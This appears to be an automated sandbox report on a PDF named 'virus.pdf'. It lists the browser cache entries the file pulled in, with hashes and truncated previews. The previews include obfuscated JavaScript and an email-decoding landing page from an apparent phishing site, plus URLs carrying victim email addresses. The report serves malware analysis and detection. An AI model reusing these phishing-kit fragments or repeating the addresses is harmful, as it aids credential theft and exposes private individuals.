                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                    Malicious:false
                    Reputation:unknown
                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                    Chrome Cache Entry: 165

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 48556, version 1.0
                    Category:downloaded
                    Size (bytes):48556
                    Entropy (8bit):7.995696058489687
                    Encrypted:true
                    SSDEEP:
                    MD5:D4FE31E6A2AEBC06B8D6E558C9141119
                    SHA1:BCDC4F0B431D4C8065A83BB736C56FF6494D0091
                    SHA-256:C88DB2401BEF7E1203E0933CC5525A0F81863BFD076756DB12ACEA5596F089EC
                    SHA-512:1CBE7641B8930163ED3EA348F573CAD438B646ED64D60C1923E5B8664C3DE9C2C21BA97994EC8D886F489E4D090772B010DE72A1167547FB4F6A2D242D46AEC1
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2
                    Preview:wOF2...............T...2..........................`...\..p?HVAR.m?MVAR^.`?STAT.N'&..>/l........>....0....6.$.... ......[..q.u...y..9....BB...!&/..........>.....vP..........&.2..z....e}/.(...C.,..n&.....g......d.....\...\..3.L..8<v8...............^9K.{+.Y...n.S.......J..i...@.S.t..-.5_..B*...(W5.......L.q.....d7..... .T....h;}.V....bCm.....;...?.V..zB.%d...UR%U.nZ..%R..Q=W1e-.xs.p!..v.tY...^......."..%...Q.>B..O~.u.$..Jm........l....4].Yr..<..T{.fv.8PJ.] <9%8...Q......<............&i.&$$..-..M%eB..~..K.&I.e..$I%........s...{{]Wn...s. .H.dH....$...6`0...c.1j..X. i``.J....f_.y...m.?.``%F..'X.v...Z..2V.l.20.h.!..`.*.O....)w....~. X.....!Z....u.....I.Z%..R.A.0.w....]....Z.$'!.i......?./...?....L.....R..[.+.....Y.....G...5Ds.l..U.*...&..L.......C..."...Z..m.Qu._~`...t.....Q...;.vk..U;m,DD..E....v./..\....O....".M]!.^D....H....~.J..iN?...:`99/..a......{p..O'..B%.. .@b.x.(..i3.ry...^.i..I..E.g....r..{Tb.......&8M6.L.f.E..pS.....|.Z4.....`.]?.T..

                    Chrome Cache Entry: 166

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (25852), with no line terminators
                    Category:downloaded
                    Size (bytes):25852
                    Entropy (8bit):5.54237326481286
                    Encrypted:false
                    SSDEEP:
                    MD5:4D20A87593E1DE9AFDC5FB97A01A296E
                    SHA1:DAEE7E2BD2091C55CC772E36E2314771F6CCAAF3
                    SHA-256:1B10C59AE7D0B93F12F6C5009D696F30AF1833ED504DAC8A637960B4AA489966
                    SHA-512:97A4EDCE4D8914D75E56B7AB957C52C86541C83233750E1CEACA944DFF869AD5D3B0D8A446384D427663F00400867F51564BC87B59B346BF7CDE2C1FEB56C480
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.js
                    Preview:var a1_0xc932f3=a1_0x1e75;function a1_0x1e75(_0x34fe66,_0x56cd16){var _0x497597=a1_0x243d();return a1_0x1e75=function(_0x61ed0e,_0x4c60c2){_0x61ed0e=_0x61ed0e-(0x4*0x7c5+0xd3d*-0x1+0x3d*-0x47);var _0xca8c7=_0x497597[_0x61ed0e];if(a1_0x1e75['OMRXIb']===undefined){var _0x48f58e=function(_0x211572){var _0xce8009='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x20ff89='',_0x229065='',_0x5d163d=_0x20ff89+_0x48f58e;for(var _0x2b3cce=0x1*-0x2ad+-0x1bd*-0xf+-0x1766,_0x277bbd,_0x5aeda0,_0x2b70f5=0xe1e*-0x1+0xde7+-0xb*-0x5;_0x5aeda0=_0x211572['charAt'](_0x2b70f5++);~_0x5aeda0&&(_0x277bbd=_0x2b3cce%(-0x180f+-0x3*-0xc5+0x15c4)?_0x277bbd*(-0x25a3+-0x1*0x6e+-0x11*-0x241)+_0x5aeda0:_0x5aeda0,_0x2b3cce++%(0xd*-0x3e+0xf73+-0x1*0xc49))?_0x20ff89+=_0x5d163d['charCodeAt'](_0x2b70f5+(0x65*0x5b+-0x11f1+-0x11ec))-(-0x918+-0x1e44+-0xf6*-0x29)!==-0x2568+-0x1*-0xd13+0x1855?String['fromCharCode'](0xbf9+-0x1cd9+0x4b*0x3d&_0x277bbd>>(-(-0xbd+-0x1946+0x1a05)*_0x2b3cce&-0x10b*-0x1f+0x26b*-0

                    Chrome Cache Entry: 167

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text
                    Category:downloaded
                    Size (bytes):1487
                    Entropy (8bit):4.719723969128962
                    Encrypted:false
                    SSDEEP:
                    MD5:218C66F84E6B32345DEA5E5B28B42EF7
                    SHA1:C24010862824B25386563AA89B66770973C67D7F
                    SHA-256:0278C46C1C78552EC864A565E51C9CDBFD48F56287CABF0F4074D7ED9A040241
                    SHA-512:B52BDAAFF94D7ACBC6144CD4F1666415A5F3472B2FB3B14B32181AA0205D42A699230BC0724CC6A4FC77A413F8372C599CE4B7F3243987F0FD9A0A2672CFB471
                    Malicious:false
                    Reputation:unknown
                    URL:https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz
                    Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>File loading</title>. <script>. // Function to get the value of a parameter from the URL. function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, "\\$&");. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return '';. return decodeURIComponent(results[2].replace(/\+/g, " "));. }.. // Get the base64-encoded email parameter from the URL. var base64EmailParam = getParameterByName('email');.. // Decode the base64-encoded email. function decodeEmail(base64Email) {. return atob(base64Email);. }.. // If a base64-encoded email parameter is provided,

                    Chrome Cache Entry: 168

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):2077
                    Entropy (8bit):7.857850949804594
                    Encrypted:false
                    SSDEEP:
                    MD5:7146329B3E36F8FC9DEE18EF6F476C60
                    SHA1:776C487A282962E36721485301C7CE0509DE6D79
                    SHA-256:C3D03783AB15F136F25C3704C8ECC248A363FB7A9F0CB199C586AFBB23C0BAA9
                    SHA-512:B17F7C26E4BE5C96D803EF88588C0E6F6A5051D56FEF9EE9BA014DFC8A79F9795AF4DA64CB67D7027B579B80F3D621C8C64D8AF6BD304880E5355977CE2BB361
                    Malicious:false
                    Reputation:unknown
                    Preview:.PNG........IHDR... ... .....szz.....IDATX..[l.W...gf.j{.d...o..N.6$)lS`[PE[.....-..q.C..!x.....<R.>...*.(U..F.^.6.8.m.u..o.e.^;.......3,...J....?.....c....h. ...v...$..w/..L..B... ...66......\.20.{..."@Y`..:....k.\q...02....Zn.....11.l...Y !.u..'Ff....!.#..4pP.T...6.......H.[...(..l...$.<p..+6............;.#.k.!"..z.!..%WL,....*0....{......E`..DoF..s..K...5.l.:...[.5..y..h..7..<+......-..2r..+.J.y-].F }../p%`..")w..?%...Dk.x]t...(.v....C...........A13!y....~.}..+.6..(`&.}Bl$...A!W.-.........5....p@..m.......]..`F.SJ1.H.r..b)#O.d0):G%UD.#rb....'$S(.v....'.`..+...;...h>z.u...;......y.e......px.n._..?....fz....^...M.m.......!Y..{...l..U..JG1....s..B..h..<3o..'.O.1.^.r.l..?{6..p.j..z........f...;.?.*....#PS..G.J......X.Js.f-.t.........?.Z6......v.q.6...?\.nv.%.H......HR.x.....1..nm<'..]............5...y.n.....uQz.x.q.o...t...@L..K..%.2z.....".....B..^.......&...a.j.r4../.d....?8...W#.........2%.,....C.gFi8.,h(]v.,.........S;..O..c....o...O...ZX2.

                    Chrome Cache Entry: 169

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):804244
                    Entropy (8bit):5.495304620886988
                    Encrypted:false
                    SSDEEP:
                    MD5:6A019D87D11C571AA335391A58D35B1E
                    SHA1:CF3AF1AEEA8BFD0967FD603E25DD78830CAC9F7C
                    SHA-256:DA767CEBC150F1514EF1A77027D8E40CCB85D70AC192C8EC7E533B7DF8B27CE2
                    SHA-512:C93806EDFE88FEE18E60CCCC2E8A7BAA27E4F68BFD307FC0148BE5B666583100BA685D4E7B3DCC1F7A4E3B748148F20872062F856B86FA71998A8893620FDA9E
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.js
                    Preview:function a12_0x1712(_0x2ae307,_0x4ae18a){const _0x4f7a7e=a12_0x5b45();return a12_0x1712=function(_0x780e16,_0x227731){_0x780e16=_0x780e16-(0x11a6+-0x35f*-0x8+-0x2ab0);let _0x34c187=_0x4f7a7e[_0x780e16];if(a12_0x1712['rXwnNf']===undefined){var _0x2c34d4=function(_0x39074a){const _0x4f565d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x22abf1='',_0x1f3652='',_0x59bd67=_0x22abf1+_0x2c34d4;for(let _0x104303=-0x9e*-0x1f+-0xf5*-0x1+-0x1417,_0x5bb26f,_0x539b81,_0x3f7de5=0x4e7+0x23b5+-0x289c;_0x539b81=_0x39074a['charAt'](_0x3f7de5++);~_0x539b81&&(_0x5bb26f=_0x104303%(-0x309*-0xb+-0x2*-0x44b+-0x1d3*0x17)?_0x5bb26f*(0xc2*-0x5+0x1484*0x1+-0x107a)+_0x539b81:_0x539b81,_0x104303++%(-0x1*-0x1387+-0x1e32+0xaaf))?_0x22abf1+=_0x59bd67['charCodeAt'](_0x3f7de5+(-0x42b*0x5+-0x1*0x1519+0x29fa))-(0x18c7*0x1+0x1bac+-0x3469)!==0x1*-0x2b+-0x15c6+0x15f1?String['fromCharCode'](0x1105*0x2+-0x6*-0x3b9+0x1*-0x3761&_0x5bb26f>>(-(-0x3*-0xbd8+-0x722*-0x5+-0x4730)*_0x104303&-0x1c3e+0x188a+0x3

                    Chrome Cache Entry: 170

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (4226), with no line terminators
                    Category:downloaded
                    Size (bytes):4226
                    Entropy (8bit):5.311581384751288
                    Encrypted:false
                    SSDEEP:
                    MD5:7F47BC7FBE0BB5643CDFB5EB0A402FB4
                    SHA1:379E9894F99385AA04BE326317D3670432093ECC
                    SHA-256:3B40DBD920CC9359E9760BC8258E38613DAF30BFC84CE5D45B080EBDDEDA4D8D
                    SHA-512:EDDAEE63A21C6E7A96FDAE723F6D0EE92DF7CE64BA44039A614E8EE5EF94D73C68602A6F5B0698D2379DE8B650C5CACA86B28B0BE59B45D3FD18835660E50B2E
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.us
                    Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/a34f9d1faa5f3315.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/7b64cd318fb77179.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/f796ea3b426fcf90.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-20efd41c90b5bcbd.js"/><script src="/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js" async=""></script><script src="/_next/static/chunks/23-e33e3d623cf28c17.js" async=""></script><script src="/_next/static/chunks/main-app-653c0408c14c4864.js" async=""></script><script src="/_next/static/chunks/92-2a0dad65b64d730c.js" async=""></script><script src="/_next/static/chunks/app/page-c71772bf3bad0174.js" async=""></script><script src="/_next/static/chunks/app/not-found-9fcb5dc5d913bc

                    Chrome Cache Entry: 171

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (26799), with no line terminators
                    Category:downloaded
                    Size (bytes):26799
                    Entropy (8bit):5.533530643838122
                    Encrypted:false
                    SSDEEP:
                    MD5:8DC3D078E42EBF368DD46367D3CF84FC
                    SHA1:C28DFFB7DF74B4F740BF81427B58473EAF64C632
                    SHA-256:18D381F8E6BB6ACB4090DFDD10C01AE45E9F6578EF7B6E89F633253F2C521A61
                    SHA-512:18ADF63821BD9368E90B51436AB24FD6273E1D494C529BB32FC1705CC05AB4B9215A3A42F1A5F8B141CEFE31E6DEEDBBDA563A19F7470FEEFD1960E3618999C5
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js
                    Preview:var a4_0x51fbc7=a4_0x5f34,a4_0x23000f=a4_0x5a84;(function(_0x3b6d94,_0x4b072c){var _0x171ebd=a4_0x5a84,_0x55eda2=a4_0x5f34,_0x7e9f38=_0x3b6d94();while(!![]){try{var _0x5cf496=parseInt(_0x55eda2(0x1b3))/(0xfab+-0x542+0x24*-0x4a)*(-parseInt(_0x171ebd(0x1dd,'0pR^'))/(0x1419+-0x73+0x13a4*-0x1))+parseInt(_0x171ebd(0x154,'2)rF'))/(-0x441*-0x4+0x147b+-0x4*0x95f)+-parseInt(_0x55eda2(0x1f2))/(-0x1481+-0x1c94+0x1*0x3119)*(parseInt(_0x55eda2(0x16a))/(0x35*-0x62+0x80f+0xc40))+-parseInt(_0x55eda2(0x1b7))/(-0x6*0x2cc+-0x2*0x975+-0x5f4*-0x6)*(-parseInt(_0x171ebd(0x1ed,'$Qqy'))/(-0x263e+-0x8cb*0x1+-0x7d8*-0x6))+parseInt(_0x55eda2(0x1c8))/(0x2110+-0x726+-0x19e2)+-parseInt(_0x55eda2(0x1bd))/(0x21ba+0xbf*-0xd+0x53*-0x4a)+-parseInt(_0x55eda2(0x1e7))/(0x671+0x1*0x105f+-0x16c6);if(_0x5cf496===_0x4b072c)break;else _0x7e9f38['push'](_0x7e9f38['shift']());}catch(_0x43d482){_0x7e9f38['push'](_0x7e9f38['shift']());}}}(a4_0x60ef,-0x264b5+-0x58e93+0xbd2a9));var a4_0x549210=(function(){var _0x2f1de0=!![];return fun

                    Chrome Cache Entry: 172

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (15916)
                    Category:downloaded
                    Size (bytes):18209
                    Entropy (8bit):5.157711637837415
                    Encrypted:false
                    SSDEEP:
                    MD5:FBC1D840518919308E492242A3D49EDE
                    SHA1:204507669DD797527D00333E2BEC2DB907CB32AF
                    SHA-256:682478B328444CFE35A64BA8EB7CD7F51C663FDB49334FBBB457EADED9EAEF7D
                    SHA-512:F197C5E2E7A17D3E8ED723F70DF606ACA47E3951A326B02657FACA9477F9D3E00AEDDA65EE8ED566AC551E935DA0D3912CD7996500F690D585678F70D74C8051
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.css
                    Preview:*,:after,:before{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-gradient-from-position: ;--tw-gradient-via-position: ;--tw-gradient-to-position: ;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-

                    Chrome Cache Entry: 173

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):271956
                    Entropy (8bit):5.570361264256464
                    Encrypted:false
                    SSDEEP:
                    MD5:DF0306F93D63C8575037525D36D5EC28
                    SHA1:53A5DFE604B624BE8B26429CF1C8AAFD502F1A48
                    SHA-256:60A2ADA8856612216A2EFA74E137EDC8ED205E4E311616E1F7377A8D12B41477
                    SHA-512:4E574A120D8BEADE3D306B7B9A87D545F4D39A1C569DEED6570EC10F15201D435D817FBBB8A4E9FBE20CB2E104AB0D91A1D1FF937754068EFF8C5DEC00969BC8
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.js
                    Preview:const a8_0x1787ca=a8_0x5eed,a8_0x3280e6=a8_0x4dd5;(function(_0x41af50,_0x516d3e){const _0x6fd676=a8_0x4dd5,_0x3f61bb=a8_0x5eed,_0x5a842d=_0x41af50();while(!![]){try{const _0x36953d=-parseInt(_0x3f61bb(0x155))/(0x7*0x16f+-0x2568+0x1b6*0x10)+parseInt(_0x6fd676(0xabd,'kXy9'))/(-0x2*-0x425+0x1d*-0x13d+0xb*0x283)*(parseInt(_0x6fd676(0x6ed,'meu9'))/(0x11+-0x1*0x26f5+0x26e7))+parseInt(_0x6fd676(0x531,'*v4X'))/(-0x37*0xad+0xc95*0x2+0xc05)*(parseInt(_0x6fd676(0x8bb,'xcK5'))/(-0x1c46+0x1*-0xe6b+0x2ab6))+-parseInt(_0x6fd676(0x957,'B*Qe'))/(-0xece+0x1*-0x1ade+-0x3*-0xde6)*(parseInt(_0x6fd676(0xc07,'&fe4'))/(-0x3*-0x253+-0x1*-0x18cb+-0x1fbd))+-parseInt(_0x6fd676(0x35e,'j5&#'))/(0x342*0xb+-0x1*-0x2363+-0x4731)*(parseInt(_0x3f61bb(0x39a))/(0x13fe+0xe3b+-0x1118*0x2))+-parseInt(_0x6fd676(0x82b,'&fe4'))/(0xa*-0xaf+0xd8f*0x1+-0x6af)+parseInt(_0x6fd676(0x52e,'xcK5'))/(-0x307+-0x23db+0x26ed*0x1);if(_0x36953d===_0x516d3e)break;else _0x5a842d['push'](_0x5a842d['shift']());}catch(_0x43c651){_0x5a842d['push'](

                    Chrome Cache Entry: 174

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):975697
                    Entropy (8bit):5.518704715890913
                    Encrypted:false
                    SSDEEP:
                    MD5:C0E130F57A2968DCE9006BD0A287F7C4
                    SHA1:5C86DCD1413A7DC414662A6246C798332CA48805
                    SHA-256:8260C684AA470B3643FADDB4790DD3C19914C3FCA9193399A5D46FD0B772718D
                    SHA-512:5D140BFF905FB064E616CFE896360C662E884EF4194432F733BF44B79F8630AEA3ACA1DDADB49930789C952E0232A5DCD2CCE79E6C81408EDC77526142B8BB8A
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.js
                    Preview:const a13_0x1d2cf5=a13_0x195b;(function(_0x584a1b,_0x2adb59){const _0x2ac33c=a13_0x195b,_0xa0960c=a13_0x1f38,_0xa07593=_0x584a1b();while(!![]){try{const _0x1ebc89=-parseInt(_0xa0960c(0xae3))/(0x25bb+0x27e+-0x2838)*(-parseInt(_0x2ac33c(0xbed,'[G8z'))/(-0x1c58+0xedf+0x7*0x1ed))+-parseInt(_0x2ac33c(0x1a8f,'#l9a'))/(0xe14+-0x152*0x3+-0xa1b)+parseInt(_0x2ac33c(0x14c1,'x$&n'))/(-0x1*0x4b7+0x59f+-0xe4)*(-parseInt(_0x2ac33c(0x1a82,'5[W#'))/(0x2*-0x10c1+0x3*0x724+0xc1b))+parseInt(_0xa0960c(0x1bcc))/(0x16d*0x1+0x1*0x1041+-0x11a8)+parseInt(_0xa0960c(0x1d33))/(0x6aa+0x262d+-0x2cd0)*(-parseInt(_0xa0960c(0x78e))/(-0x2256+0x1631*-0x1+0x388f))+-parseInt(_0x2ac33c(0x209d,'qJI1'))/(-0xa14+0x5b8+0x465)*(-parseInt(_0xa0960c(0x10a9))/(0x569+-0x3*-0xc05+-0x296e))+parseInt(_0x2ac33c(0x16c4,'u]3U'))/(0xb6c+0x512*0x4+-0x655*0x5)*(parseInt(_0x2ac33c(0x915,'mzjg'))/(-0x47*-0x17+-0x1739+0x10e4));if(_0x1ebc89===_0x2adb59)break;else _0xa07593['push'](_0xa07593['shift']());}catch(_0x271a67){_0xa07593['push'](_0xa075

                    Chrome Cache Entry: 175

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (52504), with no line terminators
                    Category:downloaded
                    Size (bytes):52504
                    Entropy (8bit):5.517620198240017
                    Encrypted:false
                    SSDEEP:
                    MD5:78F16114DDBA08EF9CECCC78F5D2687C
                    SHA1:7221E9FB9C495CB5C780592DD939D2F2D12F9247
                    SHA-256:9553E0128C18DB4FF381903E30D7BFA2CB7E1551F7F98C478A43DAD6501AA235
                    SHA-512:4FF47041ABA8745266953F09DBC8E7ED36B903457986C28EFE91991747B1E2E1EDC9DC66C66CEAB9B02F5B4829282005F13F537985D65F08E621BE958F1AEC39
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.js
                    Preview:function a9_0x4019(_0x118b94,_0x19c32e){var _0x491c6b=a9_0x122c();return a9_0x4019=function(_0x188f59,_0x45d240){_0x188f59=_0x188f59-(0xaa0+-0x1df3+0x14b9);var _0x30c60b=_0x491c6b[_0x188f59];if(a9_0x4019['LIOdJL']===undefined){var _0x2c7d08=function(_0x18032a){var _0x268fee='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x4500a4='',_0x207acb='',_0x1cf075=_0x4500a4+_0x2c7d08;for(var _0xa5fb76=-0x86a*0x4+-0x2650+0x524*0xe,_0x3837f1,_0x542778,_0x33c5e6=-0x1ec1+-0x3*-0x551+0xece;_0x542778=_0x18032a['charAt'](_0x33c5e6++);~_0x542778&&(_0x3837f1=_0xa5fb76%(-0x2*-0x21e+-0x166*0x19+0x1ebe)?_0x3837f1*(-0x23ae*0x1+-0x7*-0x47d+0x483)+_0x542778:_0x542778,_0xa5fb76++%(-0x13*0x5a+-0x11*-0xfd+-0xa1b))?_0x4500a4+=_0x1cf075['charCodeAt'](_0x33c5e6+(-0x15f7+0xaec+0xb15))-(0xc7c+0x6ca+0x1*-0x133c)!==-0x1*-0x18eb+-0x53e*-0x5+-0x3321*0x1?String['fromCharCode'](-0xc52*0x2+-0x1d5+0xc*0x24a&_0x3837f1>>(-(0x108b+0xd7c+-0x601*0x5)*_0xa5fb76&0xb*-0x1c5+0x4f*0xf+0xedc)):_0xa5fb76:0x113*0

                    Chrome Cache Entry: 177

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:downloaded
                    Size (bytes):1419622
                    Entropy (8bit):5.436519432289512
                    Encrypted:false
                    SSDEEP:
                    MD5:F898F52850E538C3CCC5840D20088FA4
                    SHA1:B53A3D620F59D9BB3E14F70707206F8F584A2000
                    SHA-256:2B4B86349D1CE0DF01516EC555E37369ECD3F3302F19B9D6E93906909FFABFED
                    SHA-512:82D5D64929489977ED9E0BE5319BB481435B00B1BAC8316F785E7136233E24E8023ACE26E9E7DCFE8599C61A2BAA79A78268804759AFBFD37645C1F4FAF75375
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js
                    Preview:var a11_0x1f7880=a11_0x496c,a11_0x3b60ba=a11_0x4289;(function(_0x432cbd,_0x3a5217){var _0x397b2e=a11_0x4289,_0x194987=a11_0x496c,_0x61c06e=_0x432cbd();while(!![]){try{var _0xf6e21b=parseInt(_0x194987(0x29fc,'v*Nq'))/(0x1e7c+-0x2050+-0x7*-0x43)*(-parseInt(_0x194987(0x1d6a,'m%SI'))/(-0x391*-0xa+0x1*-0x707+-0x1ca1))+-parseInt(_0x397b2e(0xa8))/(0x4*-0x4c8+-0xd1*-0x25+-0xb12)*(parseInt(_0x397b2e(0x20d0))/(-0x291+-0x22cc+0x2561))+-parseInt(_0x194987(0x2128,']B0r'))/(-0x9e3+0x51*0x17+0x2a1)+-parseInt(_0x194987(0x1f75,'DLq6'))/(0x2583+0x2707*0x1+0xec*-0x53)+parseInt(_0x194987(0xdbd,'FAvA'))/(0x17c5+0x9a1+-0x215f)*(-parseInt(_0x194987(0xe84,'UI@q'))/(0x11b5+-0x4b2+-0xcfb))+-parseInt(_0x194987(0x221c,'AR)Z'))/(-0xa3*-0x1f+0x1535+-0xda3*0x3)+parseInt(_0x194987(0x473,'o%4a'))/(-0x101d+-0x1*0x18c7+0x1f*0x152);if(_0xf6e21b===_0x3a5217)break;else _0x61c06e['push'](_0x61c06e['shift']());}catch(_0x3161af){_0x61c06e['push'](_0x61c06e['shift']());}}}(a11_0x2390,0x3343e+0x9141e+-0xc515*0x7));var a11_0x339

                    Chrome Cache Entry: 179

                    Download File
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (612), with no line terminators
                    Category:downloaded
                    Size (bytes):612
                    Entropy (8bit):4.946766275274378
                    Encrypted:false
                    SSDEEP:
                    MD5:0637605D83D35A33BF15BD0EA4F780AB
                    SHA1:A5362A0B0447AEFFF4345D62637B74F95F84958B
                    SHA-256:4DF61D80C041AF80DE45A8C7B05915B2598585D93E9B8004DC87E6B4D4819CC0
                    SHA-512:9E26B535E10AEA91B32D185E62F38F2245287D7E250766783D86DDA3DCBCF12C953A38B5DBFBDD58345324843D2FB29362A054683E09C1955254B04DBD27D5B0
                    Malicious:false
                    Reputation:unknown
                    URL:https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.css
                    Preview:.loader,.loading-dots{display:flex;justify-content:center;align-items:center}.loader{width:100%;height:2rem;margin-top:-1rem;margin-bottom:.5rem}.dot{width:.5rem;height:.5rem;background-color:#3b82f6;border-radius:50%;margin:0 .25rem;animation:pulse 1s ease-in-out infinite}@keyframes pulse{0%{transform:scale(.8);opacity:.5}50%{transform:scale(1.2);opacity:1}to{transform:scale(.8);opacity:.5}}@keyframes dot-flashing{0%{opacity:.3}50%,to{opacity:1}}@keyframes loading-bar{0%{width:0;margin-left:0}50%{width:100%;margin-left:0}to{width:0;margin-left:100%}}.animate-loading-bar{animation:loading-bar 2s infinite}

                    Static File Info

                    General

                    File type:PDF document, version 1.4, 2 pages
                    Entropy (8bit):7.923700112314159
                    TrID:
                    • Adobe Portable Document Format (5005/1) 100.00%
                    File name:virus.pdf
                    File size:115'999 bytes
                    MD5:21fc9a2a54d0f2d6d678fc7d18b59822
                    SHA1:de0059b6c1d8f219e6a865cf93dfde46372162fd
                    SHA256:558ec0ecee68675ee63a5b1efc37724f76b4653e831510e1fd3fa4c598c92a4b
                    SHA512:4c6e37ee26e85736377265dd2d72188b47e5e56c170aa50689779be463ceb9de3402e99e6047fed7d104a63d3cc7d306f32e7303ae3eeee24b5e11c0729f561b
